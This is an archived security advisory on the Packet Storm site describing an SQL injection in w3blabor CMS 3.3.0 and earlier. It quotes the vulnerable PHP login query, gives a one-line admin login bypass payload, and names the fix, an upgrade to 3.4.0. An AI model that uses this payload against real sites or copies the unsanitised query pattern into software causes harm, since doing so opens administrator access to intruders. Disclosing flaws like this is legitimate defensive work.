what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

w3blabor CMS 3.3.0 SQL Injection

w3blabor CMS 3.3.0 SQL Injection
Posted Jan 2, 2009
Authored by DNX

w3blabor CMS versions 3.3.0 and below suffer from a remote SQL injection vulnerability that allows for administrative bypass.

tags | exploit, remote, sql injection
SHA-256 | a8c392a7fedd749ed7ca243609a32b0e5b1d0d5880f695925a565bf5b74cdff7

w3blabor CMS 3.3.0 SQL Injection

Change Mirror Download
                          \#'#/
(-.-)
------------------oOO---(_)---OOo-----------------
| __ __ |
| _____/ /_____ ______/ /_ __ ______ ______ |
| / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
| (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |
| /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |
| Security Research Division /____/ 2oo8 |
--------------------------------------------------
| w3blabor CMS <= v3.3.0 Admin Login Bypass |
| (requires magic_quotes_gpc = Off) |
--------------------------------------------------
[!] Discovered.: DNX
[!] Vendor.....: http://www.w3blaborcms.de
[!] Detected...: 20.12.2008
[!] Reported...: 20.12.2008
[!] Response...: 21.12.2008

[!] Background.: Sicher! Schnell! Einfach!
Das CMS wurde durch diverse Abfragen und Konfigurationen gegen Hackangriffe
abgesichert. Auch arbeitet es sehr stabil und kommuniziert schnell mit der
angebundenen Datenbank. Die Verwaltung gestaltet sich als besonders einfach im
Gegensatz zu vielen anderen Content Management Systemen - Und genau das macht
es zu etwas Besonderem!

[!] Bug........: $_POST['benutzername'] & $_POST['passwort'] in admin/index.php near line 93

93: if (isset($_GET['action']) && $_GET['action'] == "login" && $_POST['benutzername'] != "" && $_POST['passwort'] != "") {
94:
95: $check = mysql_fetch_assoc(mysql_query("SELECT * FROM admin WHERE benutzername='".$_POST['benutzername']."'"));
96:
97: if ($check['benutzername'] == "") {
98:
99: $_SESSION['login'] = false;
100: header("Location: index.php?fehler=error001");
101: exit;
102:
103: } else {
104:
105: $md5pw = md5($_POST['passwort']);
106:
107: $check = mysql_fetch_assoc(mysql_query("SELECT * FROM admin WHERE benutzername='".$_POST['benutzername']."' AND passwort='".$md5pw."'"));

[!] PoC........: To bypass the admin login:

Username: x' or 1=1/*
Password: not empty

[!] Solution...: upgrade to version 3.4.0

Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close